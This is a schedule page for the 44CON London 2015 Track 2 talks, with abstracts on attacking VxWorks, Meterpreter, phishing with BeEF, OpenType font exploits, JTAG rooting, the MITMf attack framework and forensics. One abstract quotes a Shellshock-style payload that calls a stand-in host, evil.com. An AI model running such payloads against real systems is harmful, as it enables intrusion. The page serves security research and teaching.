44CON LONDON 2015 has ended

Sign up or log in to bookmark your favorites and sync them to your phone or calendar.

Track 2 Talk [clear filter]
Thursday, September 10


Attacking VxWorks: from Stone Age to Interstellar
VxWorks is the world’s most widely-used real-time operating system deployed in embedded systems. Its market reach spans across all safety critical fields, including the Mars Curiosity rover, Boeing 787 Dreamliner, network routers to name a few. The safety critical nature of these applications make VxWorks security a major concern.

Our team has conducted a thorough security analysis on VxWorks, including its supported network protocols and OS security mechanism. We will present the tool we developed for VxWorks assessment. The main goal of our tool is to provide effective penetration testing by implementing the WdbRPC protocol in python. To show its effectiveness, we are going to reveal some of the bugs we discovered along the way.

Finally, we will wrap up by demonstrating the vulnerability we found that allows remote code execution on most VxWorks based devices. A quick Internet scan shows that at least 100k devices running VxWorks are connected to the Internet. Considering the popularity of VxWorks in the age of IoT, this issue will have a widespread impact.

avatar for Yannick Formaggio

Yannick Formaggio

Yannick is a french passionate IT security researcher at Istuary Innovation Group. He graduated from Bordeaux 1 University (France) with a master of science in Cryptography and IT Security in 2010. He worked 4 years as a subcontracting IT Security consultant for Airbus and Thales... Read More →

Thursday September 10, 2015 09:30 - 10:29
Track 2


Meterpreter: Understanding the New Shiny
The last couple of years have seen Meterpreter move forward leaps and bounds when it comes to new features and stability. Metasploit users worldwide continue to make use of it for its core feature set that is already well known, but are yet to benefit from the new features that are starting to make it a more compelling tool for red team engagements.

The goal of this talk will be to bring people up to speed on how Meterpreter has changed, evolved and become what it is in 2015. Old features will be covered, and new features will be discussed in depth, with a focus on how those new features can be used to help red teamers establish and maintain a stronger foothold in their target's network.

This presentation will not only discuss the features at a high level, but will also dive deeper into some of the more technical details around the new and more interesting features, including stageless payloads, transport modification, paranoid mode, and persistence. It will also cover some of the common pitfalls that cause shells to fail, and how to avoid them.

It may even cover a sneak peak of what's to come further down the track!

avatar for OJ Reeves

OJ Reeves

Founder, Beyond Binary
OJ Reeves is an Australian security professional who specialises in attack simulation. When not breaking networks and software he is actively contributing to the Metasploit framework, with a particular focus on Meterpreter.

Thursday September 10, 2015 11:00 - 11:59
Track 2


Old Dog, New Tricks: Forensics With PowerShell
Recent intrusion into the networks of organizations like Office of Personnel Management, Sony, JPMorgan Chase, and British Airways have shown that the question isn’t “if” your organization will be targeted, but “when”. With these attacks and many others in recent years, incident response teams have had to rapidly change tactics from the “image-and-forget” methodology to live box forensics and containment. During these engagements, forensic analysts must actively track and monitor an adversary in their network while preventing the adversary from recognizing detection but most tools are not up to the job. PowerShell brings the flexibility and in-memory nature to defenders to tackle live threats.

In this talk, I will cover how my project, PowerForensics, can provide the Digital Forensics/Incident Response community with an all in one toolset for attack response and investigation. By leveraging PowerShell’s access to the Windows API and .NET framework, PowerForensics provides investigators with a forensically sound “live” investigation platform without the need to image the hard drive. I’ll cover the background and overview of PowerForensics, including how its various capabilities can facilitate the investigation of advanced actors at scale. Finally, I’ll cap off with a complex demo, showing how PowerForensics can help blue teams investigate the real attacks they’re now facing. PowerShell isn’t just for the red team anymore.

avatar for Jared Atkinson

Jared Atkinson

Jared Atkinson is the Hunt Capability Lead with Veris Group’s Adaptive Threat Division and is an Adjunct Lecturer in Utica College’s M.S. in Cybersecurity program. Before working for Veris Group, Jared spent 4 years leading incident response missions for the U.S. Air Force... Read More →

Thursday September 10, 2015 13:30 - 14:29
Track 2


Dark Fairytales from a Phisherman (Vol.II)
Phishing attacks are a prevalent threat against large or small organisations. As professionals in the security field we need to be able to give our clients the look and feel of what a real "bad guy" may do to attack an organisation.

Leverage Phishing Frenzy and BeEF on your next engagement to ensure your client is getting the most out of their assessment. With simple templates you can launch an effective phishing campaign in minutes, and thanks to the BeEF integration you’ll be hooking and exploiting browsers in no time.

Have you ever wondered what is the best pretext to use during your phishing campaign use-case? What about timeframes? We’ll discuss statistics based on real-world professional phishing engagements. We'll also entertain you with fun (and real) hacking stories involving phishing and client-side exploitation.

Expect some new code to be released during this talk:

  • Phishing Frenzy and BeEF seamless integration (including geo location services, visual map representation, and browser finger-printing);

  • A solid BeEF autorun engine based on exploitation templates;

  • Exploit automation of common enterprise scenarios like Outlook Web Access, Citrix, HTA attacks and others.

With such an open source Swiss army knife in your tool-bag you can finally enjoy your coffee while waiting for credentials and shells.

avatar for Michele Orru

Michele Orru

antisnatchor – Michele is the lead core developer and smart-minds-recruiter for the BeEF project. Michele is also the co-author of the "Browser Hacker's Handbook." He has a deep knowledge of programming in multiple languages and paradigms, and is excited to apply this knowledge... Read More →

Thursday September 10, 2015 14:30 - 15:29
Track 2


A Trek to the Emerald City: Ring -1 Based AV
To compete in the endless race against rootkits, antivirus software vendors are slowly starting to use the Virtualization Extensions offered by commodity CPUs.

The attack surface of AV software has been has been large enough until now, but hypervisor-based AV solutions expose a whole new attack surface. By exploiting flaws in AV software, instead of Ring 0 control or full Administrator privileges, it is now possible to gain Ring -1 permissions, an almost jackpot-like Ring which allows controlling the Virtualization Extensions our CPUs employ.

This talk takes us into the realm of Hypervisor based AVs, to see how well they've managed to walk in the depths or Ring -1 in their attempts to implement a thin hypervisor layer to help in the fight against rootkits.


I worked on a couple of Hypervisor-based AVs and found interesting attack surface points in there. I think that nowadays although most of us are using AVs we're not even aware of the insecurity they're providing.

Other than that, the whole hype of "VMM" or "Ring -1" things makes it even fun, there are not many people around the globe which audit VMM code, mostly because people are afraid of those fancy words like Extended Page Tables, VM Exits and mainly memory handling.

In this presentation I'll try to remove this fear, I'll show the basic architecture of a VM-based AV and how it communicates with the outside world (e.g - usermode) and how it might be possible to abuse it in order to gain code execution and system control.

avatar for Shift


Shift is a Freelance Security Researcher interested in the fields of Computer Security.

Thursday September 10, 2015 16:00 - 16:59
Track 2


Reverse engineering and exploiting font rasterizers: the OpenType saga
Font rasterization software is clearly among the most desirable attack vectors of all time, due to multiple reasons: the wide variety of font file formats, their significant structural and logical complexity, typical programming language of choice (C/C++), average age of the code, ease of exploit delivery and internal scripting capabilities provided by the most commonly used formats (TrueType and OpenType). As every modern widespread browser, document viewer and operating system is exposed to processing external, potentially untrusted fonts, this area of security has a long history of research. As a result, nearly every major vendor releases font-related security advisories several times a year, yet we can still hear news about more 0-days floating in the wild.

Over the course of the last few months, we performed a detailed security audit of the implementation of OpenType font handling present in popular libraries, client-side applications and operating systems, which appears to have received much less attention in comparison to e.g. TrueType. During that time, we discovered a number of critical vulnerabilities, which could be used to achieve 100% reliable arbitrary code execution, bypassing all currently deployed exploit mitigations such as ASLR, DEP or SSP. More interestingly, a number of those vulnerabilities were found to be common across various products, enabling an attacker to create chains of exploits consisting of a very limited number of distinct security bugs.

The presentation will outline the current state of the art with regards to font security research, in the context of how the overall field of typography has evolved over the years, both back in the 80's and 90's and the more recent times, including the connections and ties between various font engines seen today. Following the enumeration of potential attack surfaces, we will discuss the process of reverse-engineering widespread proprietary OpenType/CFF implementations such as the Windows kernel ATMFD.DLL module (Adobe Type Manager Font Driver), and provide an in-depth analysis of the root cause and reliable exploitation process of vulnerabilities discovered in products such as Microsoft Windows, Adobe Reader, DirectWrite (Internet Explorer), FreeType and others.

avatar for Mateusz Jurczyk

Mateusz Jurczyk

Mateusz is the vice-captain of the Dragon Sector CTF team and a big fan of memory corruption. His main areas of interest are client software security, vulnerability exploitation and mitigation techniques, and delving into the darkest corners of low-level kernel internals with a... Read More →

Thursday September 10, 2015 17:00 - 17:59
Track 2


Jtagsploitation: 5 wires, 5 ways to root
JTAG comes up in nearly every hardware-related hack. In order to do anything via JTAG, you generally need a hardware debugging device that connects to anything from a standard header to undocumented test points scattered around a device. JTAG access is almost always 'game over' but it's not always clear how to turn that hardware access into privileged software access on the system.
This talk will enumerate a number of different ways to turn a 'check' for jtag access into the 'checkmate' of root shell access. Each example will demonstrate a unique method for getting root access via JTAG. Each method is also general enough to be broadly applicable across different hardware architectures and implementations. Example code and scripts will be released at the talk.

avatar for Joe FitzPatrick

Joe FitzPatrick

Joe FitzPatrick (@securelyfitz) has spent a decade working on low-level silicon debug, security validation, and penetration testing of CPUS, SOCs, and microcontrollers. He develops and delivers hardware security training at https://SecuringHardware.com, including Applied Physical Attacks on x86 Systems. In between, he keeps busy with contributions to the NSA Playset and other misdirected hardware projects, which he presents at all sorts of fun conferences... Read More →

Matt King

Matt is a hardware security resarcher at a large semiconductor company.

Thursday September 10, 2015 19:35 - 20:29
Track 2
Friday, September 11


15-Minute Linux Incident Response Live Analysis
This presentation will show attendees how to perform an initial live analysis of a Linux system in mere minutes. The focus of the talk will be a set of shell scripts that allow an investigator to quickly make a determination as to whether or not an incident has occurred without the need to shutdown the system to perform traditional dead analysis.

Within 15 minutes the investigator should have a rough idea of what has transpired and will be in a better position to determine if dead analysis is warranted. The shell scripts presented minimize the disturbance to the system and send all information to a forensics workstation over the network.

Nothing beyond basic Linux knowledge (user not administrator) is required of attendees. Attendees will leave with some tools for live analysis and also a good introduction to shell scripting for those that are new to this topic.

avatar for Philip Polstra

Philip Polstra

Dr. Phil Polstra was born at an early age and has been programming since age 8 and hacking electronics since age 12. He is currently an Associate Professor teaching Digital Forensics and computer security at Bloomsburg University of Pennsylvania. He is no stranger to infosec conferences... Read More →

Friday September 11, 2015 09:30 - 10:29
Track 2


Forging the USB armory
The availability of modern System on a Chip (SoC) parts, having low power consumption and high integration of most computer components in a single chip, empowers the open source community in creating all kind of embedded systems.

The presentation illustrates the journey that we have taken to develop an open hardware board first of its kind: the USB armory, an open source hardware design, implementing a flash drive sized computer for security applications.

The security features of the USB armory System on a Chip (SoC), combined with the openness of the board design, is meant to empower developers and users with a fully customizable USB trusted device for open and innovative personal security applications.

The presentation explores the lessons learned in making a small form factor, high specifications, embedded device with solely open source tools, its architecture and security features such as secure boot and ARM TrustZone implementation.

The security applications of the implemented concept are explored, illustrating the advantage of an open USB device with increased computational power.

The first open source application for the platform, developed by Inverse Path, for advanced file encryption functionality, will also be covered.

avatar for Andrea Barisani

Andrea Barisani

Andrea Barisani is an internationally recognized security researcher. Since owning his first Commodore-64 he has never stopped studying new technologies, developing unconventional attack vectors and exploring what makes things tick...and break. His experiences focus on large-scale... Read More →

Friday September 11, 2015 11:30 - 12:29
Track 2


MITMf: Bringing Man-In-The-Middle attacks to the 21'st century
Tired of managing countless scripts for automating your Man-In-The-Middle attacks?
Have a cool idea for a MITM attack, but don't want to spend hours writing a script from scratch?
Tired of bashing your head against the wall trying to figure out why Ettercap's filters are not working?
Well look no further!
MITMf combines new and old MITM techniques into a framework! Written in Python, It's built to be extremely extendible and reliable , while updating the current MITM attacks for the 21st century!
Currently the following plugins are available:
Responder - LLMNR, NBT-NS, WPAD and MDNS poisoner
SSLstrip+ - Partially bypass HSTS
Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing
BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
AppCachePoison - Perform App cache poisoning attacks
Ferret-NG - Transparently hijacks sessions
BrowserProfiler - Attempts to enumerate all browser plugins of connected clients
CacheKill - Kills page caching by modifying headers
FilePwn - Backdoor executables being sent over HTTP using the Backdoor Factory and BDFProxy
Inject - Inject arbitrary content into HTML content
BrowserSniper - Performs drive-by attacks on clients with out-of-date browser plugins
jskeylogger - Injects a javascript keylogger into clients webpages
Replace - Replace arbitary content in HTML content
SMBAuth - Evoke SMB challenge-response auth attempts
Upsidedownternet - Flips images 180 degrees

Available on Github ! https://github.com/byt3bl33d3r/MITMf

avatar for Marcello Salvati

Marcello Salvati

Slightly paranoid IT security enthusiast/researcher with a pathological addiction to Sherlock Holmes novels, Sushi, Video Games and being in the middle.

Friday September 11, 2015 14:00 - 14:59
Track 2


Hunting Asynchronous Vulnerabilities
In blackbox tests vulnerabilities can lurk out of sight in backend functions and background threads. Issues with no visible symptoms like blind second order SQL injection and shell command injection via nightly cronjobs or asynchronous logging functions can easily survive repeated pentests and arrive in production unfixed.

The only way to reliably hunt these down is using exploit-induced callbacks. That is, for each potential vulnerability X send an exploit that will ping your server if it fires, then patiently listen.

In this presentation, I'll show that exploit-induced callbacks can be taken far beyond () { :;}; echo 1 > /dev/udp/evil.com/53 to find blind and asynchronous XXE, (DOM)XSS, SQli, SMTP and even pure XML injection. I'll examine a range of techniques to coax applications into issuing a callback by any means possible. These will start out clean and simple and quickly degenerate into crude cross-technology/platform multi-context exploit chains, some of which are definitely not advisable for production servers.

This presentation will also cover coping strategies for some of the innate hazards associated with hosting the infrastructure required to automate finding these vulnerabilities.

avatar for James Kettle

James Kettle

Director of Research, PortSwigger Web Security
James Kettle is Director of Research at PortSwigger Web Security, where he designs and refines vulnerability detection techniques for Burp Suite's scanner. Recent work has focused on using web cache poisoning to turn caches into exploit delivery systems. James has extensive experience... Read More →

Friday September 11, 2015 15:00 - 15:59
Track 2